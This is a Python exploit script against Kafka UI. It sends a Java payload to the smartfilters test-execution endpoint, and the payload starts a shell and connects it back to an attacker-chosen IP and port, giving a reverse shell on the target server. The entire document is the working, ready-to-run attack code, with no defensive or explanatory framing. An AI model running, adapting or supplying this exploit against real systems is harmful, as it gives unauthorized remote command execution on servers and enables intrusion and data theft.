import argparse import requests def valid_port(value: str) -> int: port = int(value) if not 1 <= port <= 65535: raise argparse.ArgumentTypeError("port must be between 1 and 65535") return port def parse_args() -> argparse.Namespace: parser = argparse.ArgumentParser() parser.add_argument("--url", required=True, help="Kafka UI url") parser.add_argument("--ip", required=True, help="IP to receive reverse shell") parser.add_argument( "--port", type=valid_port, default=12345, help="Port to receive reverse shell (default: 12345)", ) return parser.parse_args() def main(args: argparse.Namespace) -> None: url = f"{args.url}/api/smartfilters/testexecutions" lhost = args.ip lport = args.port payload = { "filterCode": f"String host=\"{lhost}\";int port={lport};String cmd=\"sh\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {{p.exitValue();break;}}catch (Exception e){{}}}};p.destroy();s.close();", "key": "k", "value": "v", "headers": {}, "partition": 0, "offset": 0, "timestampMs": 1710000000000 } print(url) print(payload) response = requests.put(url, json=payload, timeout=10, verify=False) response.raise_for_status() print(response.status_code) print(response.text) if __name__ == "__main__": args = parse_args() main(args)